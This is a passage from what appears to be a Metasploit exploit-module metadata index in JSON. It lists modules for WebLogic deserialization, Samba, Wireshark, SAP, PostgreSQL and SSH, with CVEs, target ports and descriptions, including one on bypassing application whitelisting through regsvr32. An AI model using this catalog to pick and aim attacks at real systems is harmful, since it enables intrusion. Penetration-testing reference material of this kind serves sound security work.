8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-11-27 14:23:56 +0000",
"path": "/modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/teamcity_agent_xmlrpc_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/veritas_netbackup_cmdexec": {
"name": "VERITAS NetBackup Remote Command Execution",
"full_name": "exploit/multi/misc/veritas_netbackup_cmdexec",
"rank": 600,
"disclosure_date": "2004-10-21",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module allows arbitrary command execution on an\n ephemeral port opened by Veritas NetBackup, whilst an\n administrator is authenticated. The port is opened and\n allows direct console access as root or SYSTEM from\n any source address.",
"references": [
"CVE-2004-1389",
"OSVDB-11026",
"BID-11494"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb",
"is_install_path": true,
"ref_name": "multi/misc/veritas_netbackup_cmdexec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/w3tw0rk_exec": {
"name": "w3tw0rk / Pitbul IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/w3tw0rk_exec",
"rank": 600,
"disclosure_date": "2015-06-04",
"type": "exploit",
"author": [
"Jay Turla"
],
"description": "This module allows remote command execution on the w3tw0rk / Pitbul IRC Bot.",
"references": [
"OSVDB-120384",
"EDB-36652"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"w3tw0rk"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/w3tw0rk_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/w3tw0rk_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize": {
"name": "Oracle Weblogic Server Deserialization RCE",
"full_name": "exploit/multi/misc/weblogic_deserialize",
"rank": 0,
"disclosure_date": "2018-04-17",
"type": "exploit",
"author": [
"brianwrf",
"Jacob Robles"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic\n Server T3 interface can send a serialized object to the interface to\n execute code on vulnerable hosts.",
"references": [
"CVE-2018-2628",
"EDB-44553"
],
"platform": "",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows"
],
"mod_time": "2018-08-29 14:56:31 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_marshalledobject": {
"name": "Oracle Weblogic Server Deserialization RCE - MarshalledObject",
"full_name": "exploit/multi/misc/weblogic_deserialize_marshalledobject",
"rank": 0,
"disclosure_date": "2016-07-19",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Jacob Baines",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (weblogic.corba.utils.MarshalledObject)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2016-3510"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-04-03 09:21:55 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_marshalledobject.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_marshalledobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_rawobject": {
"name": "Oracle Weblogic Server Deserialization RCE - Raw Object",
"full_name": "exploit/multi/misc/weblogic_deserialize_rawobject",
"rank": 600,
"disclosure_date": "2015-01-28",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Stephen Breen",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (weblogic.jms.common.StreamMessageImpl)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2015-4852"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-03-26 17:44:52 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_rawobject.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_rawobject",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/weblogic_deserialize_unicastref": {
"name": "Oracle Weblogic Server Deserialization RCE - RMI UnicastRef",
"full_name": "exploit/multi/misc/weblogic_deserialize_unicastref",
"rank": 600,
"disclosure_date": "2017-01-25",
"type": "exploit",
"author": [
"Andres Rodriguez",
"Jacob Baines",
"Aaron Soto"
],
"description": "An unauthenticated attacker with network access to the Oracle Weblogic Server T3\n interface can send a serialized object (sun.rmi.server.UnicastRef)\n to the interface to execute code on vulnerable hosts.",
"references": [
"CVE-2017-3248"
],
"platform": "Solaris,Unix,Windows",
"arch": "",
"rport": 7001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Unix",
"Windows",
"Solaris"
],
"mod_time": "2019-04-01 17:57:28 +0000",
"path": "/modules/exploits/multi/misc/weblogic_deserialize_unicastref.rb",
"is_install_path": true,
"ref_name": "multi/misc/weblogic_deserialize_unicastref",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/wireshark_lwres_getaddrbyname": {
"name": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow",
"full_name": "exploit/multi/misc/wireshark_lwres_getaddrbyname",
"rank": 500,
"disclosure_date": "2010-01-27",
"type": "exploit",
"author": [
"babi",
"jduck <jduck@metasploit.com>",
"redsand"
],
"description": "The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n overflow. This bug was found and reported by babi.\n\n This particular exploit targets the dissect_getaddrsbyname_request function. Several\n other functions also contain potentially exploitable stack-based buffer overflows.\n\n The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n exploitation via the return address on the stack. Sending a larger string allows\n exploitation using the SEH bypass method. However, this packet will usually get\n fragmented, which may cause additional complications.\n\n NOTE: The vulnerable code is reached only when the packet dissection is rendered.\n If the packet is fragmented, all fragments must be captured and reassembled to\n exploit this issue.",
"references": [
"CVE-2010-0304",
"OSVDB-61987",
"BID-37985",
"URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html",
"URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": 921,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.2.5 on RHEL 5.4 (x64)",
"wireshark 1.2.5 on Mac OS X 10.5 (x86)",
"wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb",
"is_install_path": true,
"ref_name": "multi/misc/wireshark_lwres_getaddrbyname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/wireshark_lwres_getaddrbyname_loop": {
"name": "Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)",
"full_name": "exploit/multi/misc/wireshark_lwres_getaddrbyname_loop",
"rank": 500,
"disclosure_date": "2010-01-27",
"type": "exploit",
"author": [
"babi",
"jduck <jduck@metasploit.com>",
"redsand"
],
"description": "The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through\n 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer\n overflow. This bug was found and reported by babi.\n\n This particular exploit targets the dissect_getaddrsbyname_request function. Several\n other functions also contain potentially exploitable stack-based buffer overflows.\n\n The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents\n exploitation via the return address on the stack. Sending a larger string allows\n exploitation using the SEH bypass method. However, this packet will usually get\n fragmented, which may cause additional complications.\n\n NOTE: The vulnerable code is reached only when the packet dissection is rendered.\n If the packet is fragmented, all fragments must be captured and reassembled to\n exploit this issue.\n\n This version loops, sending the packet every X seconds until the job is killed.",
"references": [
"CVE-2010-0304",
"OSVDB-61987",
"BID-37985",
"URL-http://www.wireshark.org/security/wnpa-sec-2010-02.html",
"URL-http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?view=diff&r1=31596&r2=28492&diff_format=h"
],
"platform": "Linux,OSX,Windows",
"arch": "",
"rport": 921,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)",
"wireshark 1.2.5 on RHEL 5.4 (x64)",
"wireshark 1.2.5 on Mac OS X 10.5 (x86)",
"wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb",
"is_install_path": true,
"ref_name": "multi/misc/wireshark_lwres_getaddrbyname_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/xdh_x_exec": {
"name": "Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution",
"full_name": "exploit/multi/misc/xdh_x_exec",
"rank": 600,
"disclosure_date": "2015-12-04",
"type": "exploit",
"author": [
"Jay Turla",
"Conor Patrick",
"Matt Thayer"
],
"description": "This module allows remote command execution on an IRC Bot developed by xdh.\n This perl bot was caught by Conor Patrick with his shellshock honeypot server\n and is categorized by Markus Zanke as an fBot (Fire & Forget - DDoS Bot). Matt\n Thayer also found this script which has a description of LinuxNet perlbot.\n\n The bot answers only based on the servername and nickname in the IRC message\n which is configured on the perl script, thus you need to be an operator on the IRC\n network in order to spoof it and exploit this bot, or at least have the same IP\n as the one in the config.",
"references": [
"URL-https://conorpp.com/blog/a-close-look-at-an-operating-botnet/",
"URL-https://twitter.com/MrMookie/status/673389285676965889",
"URL-https://www.alienvault.com/open-threat-exchange/blog/elasticzombie-botnet-exploiting-elasticsearch-vulnerabilities"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 6667,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"xdh Botnet / LinuxNet perlbot"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/misc/xdh_x_exec.rb",
"is_install_path": true,
"ref_name": "multi/misc/xdh_x_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/zend_java_bridge": {
"name": "Zend Server Java Bridge Arbitrary Java Code Execution",
"full_name": "exploit/multi/misc/zend_java_bridge",
"rank": 500,
"disclosure_date": "2011-03-28",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module takes advantage of a trust relationship issue within the\n Zend Server Java Bridge. The Java Bridge is responsible for handling interactions\n between PHP and Java code within Zend Server.\n\n When Java code is encountered Zend Server communicates with the Java Bridge. The\n Java Bridge then handles the java code and creates the objects within the Java Virtual\n Machine. This interaction however, does not require any sort of authentication. This\n leaves the JVM wide open to remote attackers. Sending specially crafted data to the\n Java Bridge results in the execution of arbitrary java code.",
"references": [
"OSVDB-71420",
"ZDI-11-113",
"EDB-17078"
],
"platform": "Java",
"arch": "java",
"rport": 10001,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/misc/zend_java_bridge.rb",
"is_install_path": true,
"ref_name": "multi/misc/zend_java_bridge",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/mysql/mysql_udf_payload": {
"name": "Oracle MySQL UDF Payload Execution",
"full_name": "exploit/multi/mysql/mysql_udf_payload",
"rank": 600,
"disclosure_date": "2009-01-16",
"type": "exploit",
"author": [
"Bernardo Damele A. G. <bernardo.damele@gmail.com>",
"todb <todb@metasploit.com>",
"h00die"
],
"description": "This module creates and enables a custom UDF (user defined function) on the\n target host via the SELECT ... into DUMPFILE method of binary injection. On\n default Microsoft Windows installations of MySQL (<= 5.5.9), directory write\n permissions are not enforced, and the MySQL service runs as LocalSystem.\n\n NOTE: This module will leave a payload executable on the target system when the\n attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()\n and sys_exec() functions.",
"references": [
"URL-http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 3306,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/mysql/mysql_udf_payload.rb",
"is_install_path": true,
"ref_name": "multi/mysql/mysql_udf_payload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ntp/ntp_overflow": {
"name": "NTP Daemon readvar Buffer Overflow",
"full_name": "exploit/multi/ntp/ntp_overflow",
"rank": 400,
"disclosure_date": "2001-04-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack based buffer overflow in the\n ntpd and xntpd service. By sending an overly long 'readvar'\n request it is possible to execute code remotely. As the stack\n is corrupted, this module uses the Egghunter technique.",
"references": [
"CVE-2001-0414",
"OSVDB-805",
"BID-2540",
"US-CERT-VU-970472"
],
"platform": "Linux",
"arch": "x86",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"RedHat Linux 7.0 ntpd 4.0.99j",
"RedHat Linux 7.0 ntpd 4.0.99j w/debug",
"RedHat Linux 7.0 ntpd 4.0.99k",
"Debugging"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/multi/ntp/ntp_overflow.rb",
"is_install_path": true,
"ref_name": "multi/ntp/ntp_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/php/php_unserialize_zval_cookie": {
"name": "PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)",
"full_name": "exploit/multi/php/php_unserialize_zval_cookie",
"rank": 200,
"disclosure_date": "2007-03-04",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"GML <grandmasterlogic@gmail.com>",
"Stefan Esser <sesser@hardened-php.net>"
],
"description": "This module exploits an integer overflow vulnerability in the unserialize()\n function of the PHP web server extension. This vulnerability was patched by\n Stefan in version 4.5.0 and applies to all previous versions supporting this function.\n This particular module targets numerous web applications and is based on the proof\n of concept provided by Stefan Esser. This vulnerability requires approximately 900k\n of data to trigger due to the multiple Cookie headers requirement. Since we\n are already assuming a fast network connection, we use a 2Mb block of shellcode for\n the brute force, allowing quick exploitation for those with fast networks.\n\n One of the neat things about this vulnerability is that on x86 systems, the EDI register points\n into the beginning of the hashtable string. This can be used with an egghunter to\n quickly exploit systems where the location of a valid \"jmp EDI\" or \"call EDI\" instruction\n is known. The EDI method is faster, but the bandwidth-intensive brute force used by this\n module is more reliable across a wider range of systems.",
"references": [
"CVE-2007-1286",
"OSVDB-32771",
"URL-http://www.php-security.org/MOPB/MOPB-04-2007.html"
],
"platform": "Linux",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Linux x86 Generic",
"Linux x86 phpBB2",
"Linux x86 punBB",
"Linux x86 WWWThreads",
"Linux x86 Deadman Redirect",
"Linux x86 PhpWebGallery",
"Linux x86 Ariadne-CMS",
"Linux x86 ProMA",
"Linux x86 eGroupware"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/php/php_unserialize_zval_cookie.rb",
"is_install_path": true,
"ref_name": "multi/php/php_unserialize_zval_cookie",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/php/wp_duplicator_code_inject": {
"name": "Snap Creek Duplicator WordPress plugin code injection",
"full_name": "exploit/multi/php/wp_duplicator_code_inject",
"rank": 0,
"disclosure_date": "2018-08-29",
"type": "exploit",
"author": [
"Julien Legras <julien.legras@synacktiv.com>",
"Thomas Chauchefoin <thomas.chauchefoin@synacktiv.com>"
],
"description": "When the WordPress plugin Snap Creek Duplicator restores a backup, it\n leaves dangerous files in the filesystem such as installer.php and\n installer-backup.php. These files allow anyone to call a function that\n overwrites the wp-config.php file AND this function does not sanitize\n POST parameters before inserting them inside the wp-config.php file,\n leading to arbitrary PHP code execution.\n WARNING: This exploit WILL break the wp-config.php file. If possible try\n to restore backups of the configuration after the exploit to make the\n WordPress site work again.",
"references": [
"URL-https://www.synacktiv.com/ressources/advisories/WordPress_Duplicator-1.2.40-RCE.pdf",
"WPVDB-9123",
"CVE-2018-17207"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress Duplicator <= 1.2.40"
],
"mod_time": "2018-12-11 11:59:19 +0000",
"path": "/modules/exploits/multi/php/wp_duplicator_code_inject.rb",
"is_install_path": true,
"ref_name": "multi/php/wp_duplicator_code_inject",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/postgres/postgres_createlang": {
"name": "PostgreSQL CREATE LANGUAGE Execution",
"full_name": "exploit/multi/postgres/postgres_createlang",
"rank": 400,
"disclosure_date": "2016-01-01",
"type": "exploit",
"author": [
"Micheal Cottingham",
"midnitesnake",
"Nixawk"
],
"description": "Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.\n Most commonly this is Perl and Python. When enabled, command execution is possible on the host.\n To execute system commands, loading the \"untrusted\" version of the language is necessary.\n This requires a superuser. This is usually postgres. The execution should be platform-agnostic,\n and has been tested on OS X, Windows, and Linux.\n\n This module attempts to load Perl or Python to execute system commands. As this dynamically loads\n a scripting language to execute commands, it is not necessary to drop a file on the filesystem.\n\n Only Postgres 8 and up are supported.",
"references": [
"URL-http://www.postgresql.org/docs/current/static/sql-createlanguage.html",
"URL-http://www.postgresql.org/docs/current/static/plperl.html",
"URL-http://www.postgresql.org/docs/current/static/plpython.html"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "cmd",
"rport": 5432,
"autofilter_ports": [
5432
],
"autofilter_services": [
"postgres"
],
"targets": [
"Automatic"
],
"mod_time": "2019-04-01 18:58:14 +0000",
"path": "/modules/exploits/multi/postgres/postgres_createlang.rb",
"is_install_path": true,
"ref_name": "multi/postgres/postgres_createlang",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/realserver/describe": {
"name": "RealServer Describe Buffer Overflow",
"full_name": "exploit/multi/realserver/describe",
"rank": 500,
"disclosure_date": "2002-12-20",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in RealServer 7/8/9\n and was based on Johnny Cyberpunk's THCrealbad exploit. This\n code should reliably exploit Linux, BSD, and Windows-based\n servers.",
"references": [
"CVE-2002-1643",
"OSVDB-4468"
],
"platform": "BSD,Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/realserver/describe.rb",
"is_install_path": true,
"ref_name": "multi/realserver/describe",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/samba/nttrans": {
"name": "Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",
"full_name": "exploit/multi/samba/nttrans",
"rank": 200,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module attempts to exploit a buffer overflow vulnerability present in\n versions 2.2.2 through 2.2.6 of Samba.\n\n The Samba developers report this as:\n \"Bug in the length checking for encrypted password change requests from clients.\"\n\n The bug was discovered and reported by the Debian Samba Maintainers.",
"references": [
"CVE-2002-1318",
"OSVDB-14525",
"BID-6210",
"URL-http://www.samba.org/samba/history/samba-2.2.7a.html"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/samba/nttrans.rb",
"is_install_path": true,
"ref_name": "multi/samba/nttrans",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/samba/usermap_script": {
"name": "Samba \"username map script\" Command Execution",
"full_name": "exploit/multi/samba/usermap_script",
"rank": 600,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command execution vulnerability in Samba\n versions 3.0.20 through 3.0.25rc3 when using the non-default\n \"username map script\" configuration option. By specifying a username\n containing shell meta characters, attackers can execute arbitrary\n commands.\n\n No authentication is needed to exploit this vulnerability since\n this option is used to map usernames prior to authentication!",
"references": [
"CVE-2007-2447",
"OSVDB-34700",
"BID-23972",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534",
"URL-http://samba.org/samba/security/CVE-2007-2447.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/samba/usermap_script.rb",
"is_install_path": true,
"ref_name": "multi/samba/usermap_script",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/sap/sap_mgmt_con_osexec_payload": {
"name": "SAP Management Console OSExecute Payload Execution",
"full_name": "exploit/multi/sap/sap_mgmt_con_osexec_payload",
"rank": 600,
"disclosure_date": "2011-03-08",
"type": "exploit",
"author": [
"Chris John Riley",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module executes an arbitrary payload through the SAP Management Console\n SOAP Interface. A valid username and password for the SAP Management Console must\n be provided. This module has been tested successfully on both Windows and Linux\n platforms running SAP Netweaver. In order to exploit a Linux platform, the target\n system must have the wget command available.",
"references": [
"URL-http://blog.c22.cc/toolsscripts/metasploit-modules/sap_mgmt_con_osexecute/"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 50013,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
50013
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_mgmt_con_osexec_payload.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_mgmt_con_osexec_payload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/sap/sap_soap_rfc_sxpg_call_system_exec": {
"name": "SAP SOAP RFC SXPG_CALL_SYSTEM Remote Command Execution",
"full_name": "exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec",
"rank": 500,
"disclosure_date": "2013-03-26",
"type": "exploit",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver SXPG_CALL_SYSTEM function, on the SAP SOAP\n RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.",
"references": [
"OSVDB-93537",
"URL-http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_soap_rfc_sxpg_call_system_exec.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_soap_rfc_sxpg_call_system_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/sap/sap_soap_rfc_sxpg_command_exec": {
"name": "SAP SOAP RFC SXPG_COMMAND_EXECUTE Remote Command Execution",
"full_name": "exploit/multi/sap/sap_soap_rfc_sxpg_command_exec",
"rank": 500,
"disclosure_date": "2012-05-08",
"type": "exploit",
"author": [
"nmonkee"
],
"description": "This module abuses the SAP NetWeaver SXPG_COMMAND_EXECUTE function, on the SAP\n SOAP RFC Service, to execute remote commands. This module needs SAP credentials with\n privileges to use the /sap/bc/soap/rfc in order to work. The module has been tested\n successfully on Windows 2008 64-bit and Linux 64-bit platforms.",
"references": [
"URL-http://labs.mwrinfosecurity.com/blog/2012/09/03/sap-parameter-injection",
"URL-https://service.sap.com/sap/support/notes/1764994",
"URL-https://service.sap.com/sap/support/notes/1341333"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows x64"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/sap/sap_soap_rfc_sxpg_command_exec.rb",
"is_install_path": true,
"ref_name": "multi/sap/sap_soap_rfc_sxpg_command_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/script/web_delivery": {
"name": "Script Web Delivery",
"full_name": "exploit/multi/script/web_delivery",
"rank": 0,
"disclosure_date": "2013-07-19",
"type": "exploit",
"author": [
"Andrew Smith \"jakx\" <jakx.ppr@gmail.com>",
"Ben Campbell <eat_meatballs@hotmail.co.uk>",
"Chris Campbell",
"Casey Smith",
"Trenton Ivey",
"g0tmi1k"
],
"description": "This module quickly fires up a web server that serves a payload.\n It provides a command that will allow a payload to download and execute.\n It will do this using either the specified scripting language interpreter or \"squiblydoo\" via regsvr32.exe\n for bypassing application whitelisting. The main purpose of this module is to quickly establish\n a session on a target machine when the attacker has to manually type in the command:\n e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution.\n This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege\n escalations supplied by Meterpreter.\n\n When using either of the PSH targets, ensure the payload architecture matches the target computer\n or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.\n\n Regsvr32 uses the \"squiblydoo\" technique for bypassing application whitelisting.\n The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included\n PowerShell command inside of it. Both web requests (i.e., the .sct file and PowerShell download/execute)\n can occur on the same port.\n\n \"PSH (Binary)\" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed.",
"references": [
"URL-https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html",
"URL-https://www.pentestgeek.com/2013/07/19/invoke-shellcode/",
"URL-http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/",
"URL-https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html",
"URL-https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html"
],
"platform": "PHP,Python,Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Python",
"PHP",
"PSH",
"Regsvr32",
"PSH (Binary)"
],
"mod_time": "2017-10-26 15:01:53 +0000",
"path": "/modules/exploits/multi/script/web_delivery.rb",
"is_install_path": true,
"ref_name": "multi/script/web_delivery",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ssh/sshexec": {
"name": "SSH User Code Execution",
"full_name": "exploit/multi/ssh/sshexec",
"rank": 0,
"disclosure_date": "1999-01-01",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Brandon Knight"
],
"description": "This module connects to the target system and executes the necessary\n commands to run the specified payload via SSH. If a native payload is\n specified, an appropriate stager will be used.",
"references": [
"CVE-1999-0502"
],
"platform": "Linux,OSX,Python,Unix",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux x86",
"Linux x64",
"Linux armle",
"Linux mipsle",
"Linux mipsbe",
"Linux aarch64",
"OSX x86",
"OSX x64",
"Python",
"Unix Cmd"
],
"mod_time": "2018-11-04 09:29:41 +0000",
"path": "/modules/exploits/multi/ssh/sshexec.rb",
"is_install_path": true,
"ref_name": "multi/ssh/sshexec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/svn/svnserve_date": {
"name": "Subversion Date Svnserve",
